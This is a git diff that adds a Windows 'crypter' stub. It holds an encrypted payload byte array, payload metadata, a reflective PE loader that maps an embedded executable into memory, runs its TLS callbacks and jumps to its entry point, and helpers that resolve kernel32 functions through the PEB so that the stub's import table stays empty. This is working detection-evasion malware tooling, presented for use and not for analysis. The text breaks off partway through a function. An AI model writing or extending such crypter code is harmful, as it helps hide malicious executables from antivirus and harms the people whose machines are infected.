0x16,0x07,0x2a,0xac,0xb6,0x6e,0x84,0xa7,0x73,0x18,0xeb,0x6f,0x82,0x94,0xc1,0xe7, + 0xcd,0x2e,0xec,0x62,0x7b,0xf0,0x08,0x0e,0x0a,0xf2,0x9a,0xd0,0xd8,0xff,0x1f,0x3e, + 0xa1,0xd0,0x62,0x54,0xa2,0xb4,0xec,0x14,0xbc,0x25,0x15,0x8d,0xf4,0x92,0x78,0xa6, + 0xd6,0x38,0x04,0x81,0xb9,0x03,0x4f,0xf1,0x9d,0x6a,0x14,0xf9,0xe1,0x19,0x5d,0x22, + 0x61,0x4a,0xeb,0x0c,0xfc,0xf9,0xf1,0x24,0x73,0xef,0xd1,0xab,0x9d,0xcb,0xbd,0x46, + 0x47,0x14,0xcf,0xfc,0xd8,0x57,0x74,0x78,0x52,0x78,0x23,0x4f,0xb3,0x28,0xeb,0xd0, + 0xbb,0x90,0x09,0x32,0x68,0x8c,0x18,0xfd,0xdd,0x71,0x63,0xea,0xa1,0x71,0x95,0x98, + 0x43,0x87,0xb1,0x19,0x1b,0x45,0x1e,0x65,0x2a,0xc8,0x19,0xb2,0x43,0x4c,0x8e,0x05, + 0x83,0x75,0x80,0xe3,0xbb,0xbf,0xe5,0x04,0xee,0xb3,0x8f,0x5e,0x55,0x07,0x04,0xba, + 0xbf,0xe5,0x8f,0x67,0xf6,0xaf,0xee,0x5b,0xbc,0xe5,0x6c,0x5e,0xf4,0x4e,0x09,0xe6, + 0x5c,0x11,0xac,0x23,0x68,0xb7,0x1b,0x50,0xaa,0x79,0x39,0x4f,0x1c,0x7e,0x2d,0x1e, + 0x7f,0xcb,0x2b,0x5f,0xcd,0x79,0xcb,0xa3,0x8b,0xf5,0xbe,0xf7,0x0a,0x34,0x01,0x2b, + 0x6c,0x22,0x13,0x98,0x8b,0xa7,0xbf,0xf5,0xb4,0x4d,0xc5,0x92,0x6a,0x3f,0x25,0xc8, + 0xc7,0x4a,0x7a,0x66,0x25,0xae,0x07,0x07,0x1a,0xf2,0x65,0xea,0x29,0xbb,0xc9,0x0a, + 0xd5,0x3e,0x94,0xb1,0xc0,0xd8,0xc4,0xe3,0x31,0xbb,0xc7,0x6d,0x94,0x70,0xaf,0x96, + 0x1a,0xac,0x80,0x0b,0xa1,0xb4,0x66,0x0e,0xae,0x86,0x04,0x09,0xd6,0xc4,0xe6,0x69, + 0xbc,0x28,0x17,0x85,0x94,0x1e,0xce,0xbd,0x45,0xed,0x43,0xd5,0xad,0x64,0xa0,0xdb, + 0xfe,0xb2,0x12,0xae,0x45,0x06,0x1d,0x32,0x4b,0x0e,0xce,0xdd,0xd4,0x1c,0xec,0x8b, + 0x45,0xf0,0x48,0x83,0x42,0x57,0xb3,0x42,0xb4,0x99,0x0d,0xf3,0x49,0xdc,0xdb,0xe5, + 0x15,0x26,0x72,0xe3,0x16,0xe8,0x60,0x4a,0xf5,0xab,0xc0,0xa3,0xcb,0x00,0xce,0xf9, + 0x83,0xd5,0x29,0x3e,0xfe,0x76,0x34,0x3a,0x72,0x6b,0x6a,0xf7,0x1c,0x4b,0x05,0x4b, + 0x14,0x3c,0xe5,0xa0,0x47,0xb9,0x7b,0x63,0x43,0xc0,0x38,0x27,0x24,0xc5,0xe0,0xd7, + 0xab,0xbb,0xaf,0x53,0x6c,0x40,0x88,0x69,0xe2,0x77,0xcc,0xc3,0x2b,0xe4,0x71,0x2e, + 0x3e,0x0b,0x20,0x33,0x7c,0xa7,0x27,0x3a,0xee,0xb0,0x8f,0x50,0xae,0x59,0x07,0x68, + 0x41,0x02,0xdf,0x39,0xe1,0x14,0x90,0x90,0xd9,0x82,0xb8,0xc9,0x09,0x33,0x24,0xc0, + 0x29,0xa5,0x45,0xcb,0x69,0xee,0x84,0x06,0x76,0xfc,0x51,0x59,0x19,0x6b,0xf7,0x99, + 0x79,0xc9,0x3b,0xa6,0x90,0x79,0xa3,0x23,0xab,0x3e,0x43,0xc5,0x8a,0x59,0xd1,0x0e, + 0xa7,0x51,0x4a,0xbb,0xa3,0x45,0xad,0x9a,0xab,0xcf,0x74,0x9e,0x79,0x5c,0xe3,0x73, + 0x37,0x01,0x39,0x17,0x3e,0x4b,0x83,0xd5,0xbc,0x59,0x8f,0xf7,0x13,0xc6,0x7d,0x2d, + 0x9d,0x46,0x51,0x47,0x2d,0x24,0xe5,0x54,0xb1,0xa5,0xdb,0x3f,0x13,0x24,0xb0,0x5a, + 0x9e,0x94,0x92,0x1c,0x29,0x6b,0x14,0xc6,0x3f,0xb5,0x01,0x89,0x27,0xbb,0x9b,0x8e, + 0xbf,0x83,0x90,0xd1,0x5b,0x08,0x81,0x0c,0x1b,0xbf,0xfa,0xab,0xfa,0x34,0xf1,0x62, + 0x83,0x92,0xd7,0x01,0xf3,0xa5,0x0b,0xb5,0x39,0x6d,0x6e,0x66,0x5a,0xad,0x50,0x42, + 0xb0,0x5b,0x09,0xb7,0x92,0x45,0x64,0xa4,0x4e,0xd0,0xb5,0x28,0x12,0x97,0x2b,0xca, + 0x2a,0xb0,0x3f,0x66,0x43,0xed,0xac,0x87,0x8e,0x51,0x78,0x82,0x40,0xf7,0xc0,0x66, + 0x46,0x15,0x92,0xe0,0x15,0x7e,0x13,0x18,0x5e,0x73,0x00,0xa2,0x00,0xd4,0xe1,0x88, + 0xc7,0x7e,0xd9,0xef,0xc2,0x44,0xf3,0xa0,0x7e,0x5d,0x35,0x48,0xa6,0xba,0x4e,0x86, + 0x5b,0x69,0x1d,0x28,0xb8,0xa1,0x99,0xcf,0x8f,0x95,0x87,0x26,0xd7,0xd7,0x10,0x84, + 0x3d,0x63,0x9f,0x3d,0x93,0xad,0xd1,0xe3,0x09,0x74,0x3f,0xb6,0x97,0xfa,0xe6,0xbc, + 0x7c,0xcc,0x38,0xe5,0x57,0xa9,0x8b,0x41,0x8c,0xe9,0xee,0x46,0x53,0x98,0xdb,0x00, + 0xba,0x95,0xb7,0xe6,0x02,0x1c,0xc6,0x1c,0x1e,0x9e,0xac,0x20,0xd7,0x94,0x5d,0x49, + 0xcc,0xa5,0x76,0x54,0x17,0xd9,0xe4,0x6e,0xca,0x54,0x51,0x85,0xa8,0x40,0x7f,0x75, + 0x00,0xdf,0x2c,0xea,0x03,0xfc,0x15,0x19,0xb6,0xfc,0x06,0x2f,0x12,0x14,0x4f,0x61, + 0x49,0x70,0xe2,0x58,0x53,0x55,0xc9,0x72,0xd5,0x58,0xa4,0x8b,0xe3,0x25,0x7f,0x79, + 0x9c,0x4b,0x81,0x9c,0xb3,0x25,0xb1,0xa6,0x9d,0xae,0x13,0xbc,0xc5,0x56,0x1f,0x7e, + 0x4d,0x9b,0xd2,0x44,0x7f,0x50,0x8d,0x19,0x31,0xe2,0x0b,0x58,0x97,0x8d,0xd0,0xa2, + 0xf1,0x78,0xfc,0xd1,0x74,0x6c,0xae,0x9f,0xb7,0xbb,0x25,0x8e,0x53,0xa4,0x42,0xfa, + 0xbd,0x28,0xf9,0xb5,0xd0,0x83,0x55,0x93,0xf2,0x3e,0xca,0x2f,0x28,0x45,0x95,0xde, + 0x15,0x0d,0x40,0xdf,0xbd,0x6c,0xa2,0xb0,0xd7,0xcf,0x62,0x02,0x21,0x54,0x4b,0x2f, + 0xbd,0xb5,0x9b,0xaa,0x68,0xa6,0xe5,0x43,0x23,0x79,0xfd,0x14,0x92,0x48,0xdb,0xcf, + 0x02,0x3b,0xb9,0x1b,0x07,0xae,0x7e,0xfe,0xaa,0x15,0x7d,0x3b,0x59,0x45,0xd7,0x20, + 0x20,0x97,0xe3,0x8f,0x8d,0xe2,0x38,0x32,0x01,0x15,0x99,0x38,0x32,0xb2,0x66,0xa2, + 0x75,0x51,0xbb,0x31,0x28,0xb7,0x79,0x0b,0x64,0x5c,0xc1,0x78,0x59,0x59,0x19,0x31, + 0xcc,0xe9,0xe7,0x5b,0xab,0xc9,0x3a,0x5c,0x10,0x99,0xe8,0x52,0x33,0x07,0x11,0x3f, + 0x3a,0x9d,0xa2,0x08,0x7b,0x0f,0x24,0x03,0x41,0x4f,0xb4,0xce,0x7c,0xba,0xde,0x47, + 0x43,0x2c,0xf2,0x7b,0x64,0x54,0xe0,0x08,0x9c,0xa6,0xef,0x5c,0xf9,0x06,0x80,0x99, + 0x6c,0x25,0x41,0xed,0x3c,0x85,0x7e,0x98,0x05,0xf9,0x91,0x98,0x07,0xdd,0xa1,0x1f, + 0x32,0xe3,0x50,0xe4,0x76,0x35,0x86,0xc4,0x60,0xbd,0xa2,0xcf,0x89,0x88,0x28,0x84, + 0x38,0xcd,0x27,0xec,0x78,0x49,0x79,0xea,0x93,0x87,0x5c,0x9f,0x5d,0xb9,0x8f,0xbe, + 0x3d,0x59,0xcd,0x64,0x1d,0x7a,0x67,0x58,0xda,0x80,0xbe,0xe0,0xde,0x9b,0x45,0x00, + 0x93,0x58,0x74,0xb3,0x9a,0x31,0x61,0xdc,0x80,0x89,0x29,0xd3,0x8a,0xbc,0x03,0xc8, + 0x7f,0x78,0xbd,0x16,0x93,0xec,0x9f,0x5d,0x74,0xab,0x6d,0x26,0xcc,0x55,0xc2,0x6c, + 0x0e,0x16,0xbf,0x8a,0x26,0x36,0xfb,0x07,0x40,0x8e,0x8c,0x60,0x52,0x31,0xaa,0x62, + 0x2d,0xe1,0x34,0x2b,0x86,0x2c,0x2c,0x91,0x5b,0x3a,0x0d,0x85,0x38,0xcb,0x54,0x42, + 0x18,0x41,0x43,0x03,0x30,0x4a,0x5a,0xb5,0x7f,0xac,0x78,0x8e,0xe2,0x32,0x88,0xc1, + 0xbb,0x2b,0x5e,0x6c,0x91,0x86,0x67,0xed,0xaa,0x10,0xc8,0xae,0xbc,0x10,0x2e,0xb9, + 0xd3,0x7d,0xe4,0x5b,0xfd,0x8f,0xa3,0xd9,0x79,0x3b,0xdb,0x3b,0x25,0x84,0x28,0x29, + 0x3d,0xae,0x47,0x71,0xa8,0x0f,0x9f,0x5e,0x1f,0x8e,0xc3,0x9b,0xce,0x4d,0x5d,0x01, + 0x65,0x45,0x6e,0x36,0xf0,0x77,0xda,0x30,0xc9,0x35,0x80,0x51,0xc7,0xdd,0xd6,0xe2, + 0x97,0xaf,0x93,0x84,0xe0,0x1b,0xa5,0x47,0x24,0x15,0xe3,0x3a,0xba,0xa6,0x9c,0x13, + 0x50,0xc6,0xbe,0xaf,0x1d,0x09,0xc2,0xb3,0x14,0x52,0x73,0xe0,0xbc,0xd5,0xef,0xf0, + 0xdc,0x6c,0xaf,0x3f,0x90,0xd3,0x10,0xe1,0x46,0xf4,0xc2,0xb7,0xea,0xff,0x29,0x85, + 0xf9,0xb1,0x16,0x9f,0xf1,0xa5,0xaf,0x0d,0x9e,0xdc,0x78,0x23,0x99,0xfd,0x8f,0x0f, + 0x91,0x45,0xd4,0x24,0x98,0x05,0xb9,0x23,0xc9,0x1b,0x3e,0x1d,0x34,0x36,0x0c,0x9b, + 0xd3,0xae,0xf3,0x46,0x1e,0x06,0x96,0xb5,0x7a,0xa4,0x6b,0x29,0xe9,0x8f,0x01,0x17, + 0xb2,0xc3,0x82,0xc0,0xd0,0x0a,0x3f,0x36,0xf0,0x6b,0x4a,0xc9,0x0b,0xbe,0x65,0xb8, + 0x83,0x75,0x31,0xe1,0x12,0xa2,0xf3,0x51,0x86,0xf7,0x89,0xc1,0x98,0x52,0x92,0x92, + 0x13,0x66,0xea,0xf8,0x59,0x28,0xdc,0x1e,0x90,0xf0,0x29,0x84,0xe4,0x4b,0xa7,0xf5, + 0x2e,0xf2,0x4c,0x91,0x71,0x6e,0x51,0xad,0x8c,0xef,0xb4,0x5e,0x23,0x75,0xfd,0xce, + 0xe8,0xe1,0x29,0x4e,0x2e,0x70,0x34,0x05,0x45,0x87,0x19,0x7b,0x42,0xb1,0x5d,0xb9, + 0x5d,0x45,0x29,0x86,0x75,0xd5,0xdd,0xa0,0x31,0x1e,0x59,0xe8,0x75,0x7d,0x1e,0x28, + 0xa4,0xee,0x43,0xc5,0xfb,0xb5,0xcc,0x8a,0xe3,0x81,0x64,0xc6,0x09,0x11,0x0b,0x26, + 0x7f,0x44,0xda,0x35,0xf4,0x1d,0xb2,0x09,0x59,0xda,0x7c,0x84,0x22,0xbe,0x9b,0x18, + 0x9c,0xb3,0xb5,0xcc,0x75,0x5a,0x38,0x65,0x06,0xb4,0xa0,0x40,0xbd,0x77,0x4e,0xad, + 0xf7,0x0b,0x94,0x52,0x6a,0xa6,0x65,0x21,0xc7,0xe7,0x59,0x1a,0x26,0x0c,0xf5,0x9d, + 0x8c,0xbd,0x81,0xeb,0xcf,0x44,0xf3,0xc8,0xe1,0x7e,0x00,0x91,0x6a,0x3b,0x99,0x34, + 0x88,0xdc,0x94,0x13,0xd9,0xa6,0x09,0xd6,0xd9,0xb4,0x05,0x60,0x3e,0x3d,0xdb,0x9d, + 0x37,0x2f,0xdd,0x2e,0xa5,0x3a,0x61,0x35,0x4a,0x87,0x48,0xf8,0x7d,0x51,0xda,0x22, + 0x57,0x30,0x44,0xfa,0x6f,0xe0,0x23,0x8f,0xe9,0x1e,0x0a,0xc8,0x2d,0x26,0xfe,0xe4, + 0x43,0xbe,0xe3,0x8f,0xeb,0x33,0x1f,0xbc,0x3b,0x54,0xc3,0x8d,0xf9,0x89,0x62,0xaf, + 0xe0,0x23,0x4a,0x92,0x7f,0xc7,0x8e,0x92,0x6c,0x42,0x5d,0xd7,0xc7,0x46,0x85,0x20, + 0xa2,0xbf,0xc0,0x7f,0xa6,0xcc,0x49,0x09,0xd0,0xa4,0x4f,0x10,0xb3,0x87,0x67,0xf1, + 0x5e,0xd3,0xa8,0x72,0x0d,0x4a,0xd7,0xc6,0xd5,0x24,0xf3,0x52,0x01,0xd4,0xf2,0x99, + 0x99,0x51,0xb1,0x47,0x79,0x19,0xaa,0x4f,0x37,0x92,0x27,0x7f,0x9d,0xae,0x6d,0x2d, + 0xcf,0x1d,0x6c,0x39,0xc6,0xcc,0x52,0xce,0xaa,0xc9,0x1e,0x6c,0x1d,0x1c,0x51,0xe1, + 0x74,0x34,0xb8,0xb3,0xc8,0xb4,0xdf,0x04,0xfa,0xed,0x87,0x05,0x5d,0x4a,0x47,0x50, + 0xd5,0x65,0x58,0xb4,0x2d,0xdc,0xc2,0x5d,0xed,0xc9,0x53,0x56,0x92,0x66,0xc7,0x72, + 0x16,0xec,0x93,0x4f,0x10,0xa5,0x03,0xd1,0x9e,0x84,0xa3,0x48,0x67,0x45,0xb2,0x1c, + 0x9d,0x6e,0x22,0x3a,0xee,0x17,0xe3,0x66,0x93,0xff,0x9f,0xc3,0x59,0x02,0x48,0xb6, + 0xbd,0xde,0x05,0x65,0x1c,0x8c,0x6b,0x89,0x0f,0x3c,0x7f,0x17,0x85,0x50,0x51,0xbf, + 0x43,0x86,0xac,0x1b,0x8e,0x0c,0x3a,0xd6,0xb8,0xa8,0x5c,0xa3,0xc8,0xdb,0xe7,0xff, + 0xeb,0xcb,0x31,0x96,0x28,0xa5,0x4a,0xf9,0x61,0xdc,0xf7,0xaf,0xb5,0xe7,0x79,0x9f, + 0x52,0xec,0x3c,0x7f,0xf7,0x73,0x4b,0x74,0x67,0xef,0x20,0x45,0xca,0xe7,0xf8,0x06, + 0x5d,0xdd,0x25,0x0d,0x18,0xe9,0x5d,0x65,0x7f,0x24,0x1f,0x1d,0xe2,0x44,0x35,0xe0, + 0x3f,0xfb,0xe4,0xc9,0xd7,0x53,0x71,0x20,0xfe,0x46,0xfd,0x48,0x1b,0x9a,0x20,0xf8, + 0x0e,0x45,0x53,0xd5,0xf1,0xc0,0xc7,0x80,0x37,0x18,0xe3,0x14,0xb0,0x4a,0x2a,0x3a, + 0xce,0x6e,0xea,0x73,0xc2,0x39,0xb0,0xe3,0x9f,0x61,0x49,0x56,0x5f,0xe3,0x63,0x27, + 0x94,0x8e,0x41,0x9d,0xd6,0xbb,0xbd,0x99,0x2b,0x68,0x17,0xbc,0xc4,0xf4,0xbb,0xed, + 0xe3,0x75,0x91,0x18,0x6a,0x9d,0x4d,0x61,0x6f,0x6a,0x06,0xbb,0x9b,0x0c,0xc4,0xd4, + 0x31,0xc0,0xf2,0xeb,0x8b,0x7f,0x82,0x32,0x80,0x3c,0x5f,0x1e,0xc1,0xa6,0x74,0x86, + 0x2e,0xf3,0xfd,0x5f,0x8d,0xd9,0x14,0x6d,0x19,0x35,0xf2,0x98,0x3a,0xe0,0xe8,0x5c, + 0xe2,0x25,0x10,0x22,0x05,0x34,0x53,0x0e,0x99,0x44,0x07,0x2e,0x1b,0x46,0x54,0x3c, + 0xc6,0xf6,0x71,0xe5,0x1e,0x76,0xc8,0x49,0xdb,0x85,0x40,0x97,0xe9,0xff,0x32,0xcb, + 0xcb,0x30,0x7c,0x97,0xbf,0x7b,0x34,0xeb,0xfb,0x01,0xb4,0x20,0x77,0x9e,0xd3,0x08, + 0x04,0xc6,0xf3,0x5c,0x7a,0xba,0xb6,0x70,0x4f,0xe3,0x8b,0x9a,0xc2,0x49,0xe7,0x6a, + 0x97,0xb4,0x0e,0xa6,0x5d,0xe8,0x90,0x47,0xab,0x31,0x90,0x06,0x48,0xee,0xbe,0x4a, + 0x48,0xd6,0xa6,0x60,0x14,0x0a,0x21,0xc8,0xa2,0x6c,0xe9,0xa8,0xa3,0x5d,0x4a,0x1a, + 0xdc,0xad,0xb3,0xac,0x8b,0xb9,0xeb,0x6a,0x0b,0x3c,0x60,0x4f,0x12,0x81,0x1a,0x2c, + 0xd6,0x72,0x8e,0xea,0x10,0xb7,0x0e,0x2f,0x68,0x38,0xf7,0x9f,0x8b,0xb1,0x20,0x5d, + 0xb4,0x0b,0xcf,0x39,0x56,0x7d,0xda,0xd2,0x37,0xd3,0x08,0x23,0xa9,0xfd,0xab,0xc9, + 0x42,0xd8,0x4f,0xcd,0xe2,0x19,0x00,0xf3,0xa5,0x31,0x0b,0xff,0x7b,0x22,0xec,0x00, + 0xec,0x5b,0x66,0x3b,0xf9,0x32,0xb1,0xb7,0x1d,0xff,0xcd,0x60,0x72,0xd1,0xf4,0xd9, + 0xef,0xce,0x2d,0xe3,0xce,0x2c,0xfc,0x63,0x0c,0xc6,0x36,0x15,0x0a,0x5d,0xf3,0xcb, + 0x50,0x6c,0x9c,0x61,0x70,0xa8,0x23,0x40,0x07,0x12,0x51,0x8c,0xdf,0xb9,0x39,0xed, + 0x32,0x10,0xcc,0xf5,0x09,0xe8,0x85,0x34,0xc2,0x0c,0x44,0xd5,0xb0,0x77,0x38,0xf4, + 0xdb,0x33,0xf5,0x7e,0xe7,0xd0,0xa4,0xc4,0x12,0x7f,0x59,0x9e,0x57,0xca,0x80,0x37, + 0xaf,0xf1,0x70,0x7a,0x76,0xe2,0x20,0x18,0xeb,0xd5,0xf8,0x34,0xd1,0x84,0xc0,0xad, + 0x32,0x03,0xb5,0x07,0x43,0x41,0xba,0xf6,0x62,0x1a,0xaa,0x87,0x3b,0x17,0xca,0xec, + 0x0a,0xc5,0x5d,0xe4,0xfa,0xae,0x51,0xc4,0xab,0xf7,0x16,0x25,0xd2,0x97,0x8e,0x2b, + 0xf9,0x30,0x20,0x6f,0x67,0x8d,0xe6,0x89,0x1b,0xb7,0x06,0x3d,0xf1,0xb5,0x1d,0x40, + 0xe6,0xe0,0xd7,0xa7,0x77,0xdf,0x9b,0xec,0x25,0x45,0x62,0x9d,0x15,0xc5,0xa7,0xa2, + 0xd4,0x0e,0x7a,0x2a,0x37,0x48,0xaf,0x33,0x60,0x2b,0x33,0xb3,0xdc,0xb8,0x7d,0x67, + 0xe8,0x96,0x22,0x37,0xd3,0x0a,0x82,0x44,0x7f,0x93,0xa0,0x8f,0x01,0x21,0x0f,0x46, + 0x67,0xf2,0x07,0xad,0x98,0x08,0x96,0xa6,0x56,0x49,0xf3,0xde,0x60,0x33,0xed,0x95, + 0xb4,0x3b,0x82,0x09,0xf2,0xc3,0x8b,0x80,0xdb,0xb6,0x94,0xef,0xf7,0xc1,0xc9,0x4b, + 0x55,0x2e,0x0b,0x6b,0x6d,0x5f,0x22,0x97,0x21,0xe5,0x0c,0xb1,0xe2,0x3b,0x72,0xfe, + 0xee,0x24,0x3b,0x91,0xb6,0x9e,0x3a,0x53,0x5e,0x80,0x02,0xb2,0x5d,0xb6,0xda,0xe5, + 0x43,0x18,0xca,0xd9,0x9a,0xe2,0xd4,0xba,0xe5,0xd3,0x40,0x21,0xc5,0xe4,0x10,0xd6, + 0x3a,0xa4,0x91,0x41,0x05,0x2e,0x12,0x73,0x2b,0xc7,0xae,0xcb,0x96,0x17,0x45,0x47, +}; diff --git a/crypter/stub/payload_meta.h b/crypter/stub/payload_meta.h new file mode 100644 index 0000000..14d1db1 --- /dev/null +++ b/crypter/stub/payload_meta.h @@ -0,0 +1,5 @@ +#pragma once +#include + +#define PAYLOAD_SEED 0x559DA186u +#define PAYLOAD_SIZE 705024u diff --git a/crypter/stub/pe_load.c b/crypter/stub/pe_load.c new file mode 100644 index 0000000..f5c2ef9 --- /dev/null +++ b/crypter/stub/pe_load.c @@ -0,0 +1,149 @@ +#include +#include +#include "peb_utils.h" +#include "pe_load.h" + +typedef LPVOID(WINAPI *pfnVA)(LPVOID, SIZE_T, DWORD, DWORD); +typedef BOOL(WINAPI *pfnVP)(LPVOID, SIZE_T, DWORD, PDWORD); +typedef HMODULE(WINAPI *pfnLL)(LPCSTR); +typedef FARPROC(WINAPI *pfnGP)(HMODULE, LPCSTR); + +static void _cpy(void *dst, const void *src, size_t n) +{ + unsigned char *d = (unsigned char *)dst; + const unsigned char *s = (const unsigned char *)src; + while (n--) + *d++ = *s++; +} + +static DWORD _sec_prot(DWORD chr) +{ + if (chr & IMAGE_SCN_MEM_EXECUTE) + return (chr & IMAGE_SCN_MEM_WRITE) ? PAGE_EXECUTE_READWRITE : PAGE_EXECUTE_READ; + return (chr & IMAGE_SCN_MEM_WRITE) ? PAGE_READWRITE : PAGE_READONLY; +} + +void pe_load(const uint8_t *data, size_t size) +{ + (void)size; + + /* resolve APIs from kernel32 via PEB — nothing in stub import table */ + HMODULE k32 = _peb_mod(L"kernel32.dll"); + pfnVA fnVA = (pfnVA)_peb_proc(k32, "VirtualAlloc"); + pfnVP fnVP = (pfnVP)_peb_proc(k32, "VirtualProtect"); + pfnLL fnLL = (pfnLL)_peb_proc(k32, "LoadLibraryA"); + pfnGP fnGP = (pfnGP)_peb_proc(k32, "GetProcAddress"); + if (!fnVA || !fnVP || !fnLL || !fnGP) + return; + + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)data; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(data + dos->e_lfanew); + DWORD img_sz = nt->OptionalHeader.SizeOfImage; + DWORD hdr_sz = nt->OptionalHeader.SizeOfHeaders; + ULONGLONG pref = nt->OptionalHeader.ImageBase; + + /* allocate: preferred base first, then anywhere */ + uint8_t *base = (uint8_t *)fnVA((LPVOID)pref, img_sz, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (!base) + base = (uint8_t *)fnVA(NULL, img_sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (!base) + return; + + /* copy headers */ + _cpy(base, data, hdr_sz); + + /* copy sections */ + IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt); + for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++) + { + if (sec[i].SizeOfRawData) + _cpy(base + sec[i].VirtualAddress, + data + sec[i].PointerToRawData, + sec[i].SizeOfRawData); + } + + /* base relocations */ + ULONGLONG delta = (ULONGLONG)base - pref; + IMAGE_DATA_DIRECTORY *rdir = + &nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; + if (delta && rdir->VirtualAddress) + { + IMAGE_BASE_RELOCATION *blk = + (IMAGE_BASE_RELOCATION *)(base + rdir->VirtualAddress); + while (blk->VirtualAddress && blk->SizeOfBlock >= sizeof(*blk)) + { + int cnt = (int)((blk->SizeOfBlock - sizeof(*blk)) / sizeof(WORD)); + WORD *ent = (WORD *)((uint8_t *)blk + sizeof(*blk)); + for (int i = 0; i < cnt; i++) + { + if ((ent[i] >> 12) == IMAGE_REL_BASED_DIR64) + { + ULONGLONG *ptr = + (ULONGLONG *)(base + blk->VirtualAddress + (ent[i] & 0xFFF)); + *ptr += delta; + } + } + blk = (IMAGE_BASE_RELOCATION *)((uint8_t *)blk + blk->SizeOfBlock); + } + } + + /* import table */ + IMAGE_DATA_DIRECTORY *idir = + &nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; + if (idir->VirtualAddress) + { + IMAGE_IMPORT_DESCRIPTOR *imp = + (IMAGE_IMPORT_DESCRIPTOR *)(base + idir->VirtualAddress); + for (; imp->Name; imp++) + { + HMODULE dll = fnLL((const char *)(base + imp->Name)); + if (!dll) + continue; + IMAGE_THUNK_DATA *thk = (IMAGE_THUNK_DATA *)(base + imp->FirstThunk); + IMAGE_THUNK_DATA *orig = imp->OriginalFirstThunk + ? (IMAGE_THUNK_DATA *)(base + imp->OriginalFirstThunk) + : thk; + for (; orig->u1.AddressOfData; thk++, orig++) + { + if (IMAGE_SNAP_BY_ORDINAL64(orig->u1.Ordinal)) + thk->u1.Function = + (ULONGLONG)fnGP(dll, (LPCSTR)(orig->u1.Ordinal & 0xFFFF)); + else + { + IMAGE_IMPORT_BY_NAME *ibn = + (IMAGE_IMPORT_BY_NAME *)(base + orig->u1.AddressOfData); + thk->u1.Function = (ULONGLONG)fnGP(dll, ibn->Name); + } + } + } + } + + /* set section permissions */ + for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++) + { + DWORD vsz = sec[i].Misc.VirtualSize ? sec[i].Misc.VirtualSize + : sec[i].SizeOfRawData; + if (!vsz) + continue; + DWORD old; + fnVP(base + sec[i].VirtualAddress, vsz, _sec_prot(sec[i].Characteristics), &old); + } + + /* TLS callbacks */ + IMAGE_DATA_DIRECTORY *tdir = + &nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS]; + if (tdir->VirtualAddress) + { + IMAGE_TLS_DIRECTORY64 *tls = + (IMAGE_TLS_DIRECTORY64 *)(base + tdir->VirtualAddress); + PIMAGE_TLS_CALLBACK *cb = (PIMAGE_TLS_CALLBACK *)tls->AddressOfCallBacks; + if (cb) + for (; *cb; cb++) + (*cb)((PVOID)base, DLL_PROCESS_ATTACH, NULL); + } + + /* call OEP */ + typedef void (*oep_t)(void); + ((oep_t)(base + nt->OptionalHeader.AddressOfEntryPoint))(); +} diff --git a/crypter/stub/pe_load.h b/crypter/stub/pe_load.h new file mode 100644 index 0000000..5420acb --- /dev/null +++ b/crypter/stub/pe_load.h @@ -0,0 +1,5 @@ +#pragma once +#include +#include + +void pe_load(const uint8_t *data, size_t size); diff --git a/crypter/stub/peb_utils.h b/crypter/stub/peb_utils.h new file mode 100644 index 0000000..a0443a2 --- /dev/null +++ b/crypter/stub/peb_utils.h @@ -0,0 +1,79 @@ +#pragma once +#include +#include +#include + +/* Minimal LDR structures — offsets validated against Win10/11 x64 */ + +typedef struct { USHORT Len, MaxLen; PWSTR Buf; } _USTR; + +typedef struct _LDRE { + LIST_ENTRY LoadOrd; /* 0x00 */ + LIST_ENTRY MemOrd; /* 0x10 */ + LIST_ENTRY InitOrd; /* 0x20 */ + PVOID Base; /* 0x30 */ + PVOID EntryPt; /* 0x38 */ + ULONG ImgSz; /* 0x40 */ + /* 4 bytes padding here (compiler-inserted) */ + _USTR FullName; /* 0x48 */ + _USTR BaseName; /* 0x58 */ +} _LDRE; + +typedef struct { + ULONG Len; /* 0x00 */ + BOOLEAN Init; /* 0x04 */ + /* 3 bytes padding */ + PVOID SsHandle; /* 0x08 */ + LIST_ENTRY LoadOrdList; /* 0x10 */ + LIST_ENTRY MemOrdList; /* 0x20 */ +} _LDRD; + +/* Find loaded module by name (case-insensitive ASCII) */ +static inline HMODULE _peb_mod(const wchar_t *name) { + ULONG_PTR peb; +#ifdef _WIN64 + peb = __readgsqword(0x60); +#else + peb = __readfsdword(0x30); +#endif + _LDRD *ldr = *(_LDRD **)(peb + 0x18); + LIST_ENTRY *h = &ldr->MemOrdList, *c = h->Flink; + while (c != h) { + _LDRE *e = CONTAINING_RECORD(c, _LDRE, MemOrd); + if (e->BaseName.Buf) { + const wchar_t *a = e->BaseName.Buf, *b = name; + int ok = 1; + while (*a && *b) { + wchar_t ca = (*a >= L'A' && *a <= L'Z') ? (*a | 0x20) : *a; + wchar_t cb = (*b >= L'A' && *b <= L'Z') ? (*b | 0x20) : *b; + if (ca != cb) { ok = 0; break; } + a++; b++; + } + if (ok && !*a && !*b) + return (HMODULE)e->Base; + } + c = c->Flink; + } + return NULL; +} + +/* Resolve export by name from a loaded module */ +static inline FARPROC _peb_proc(HMODULE mod, const char *name) { + uint8_t *b = (uint8_t *)mod; + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)b; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(b + dos->e_lfanew); + IMAGE_DATA_DIRECTORY *d = + &nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; + if (!d->VirtualAddress) return NULL; + IMAGE_EXPORT_DIRECTORY *exp = (IMAGE_EXPORT_DIRECTORY *)(b + d->VirtualAddress); + DWORD *nms = (DWORD *)(b + exp->AddressOfNames); + WORD *ord = (WORD *)(b + exp->AddressOfNameOrdinals); + DWORD *fns = (DWORD *)(b + exp->AddressOfFunctions); + for (DWORD i = 0; i < exp->NumberOfNames; i++) { + const char *n = (const char *)(b + nms[i]), *p = name; + while (*n && *p && *n == *p) { n++; p++; } + if (!*n && !*p) + return (FARPROC)(b + 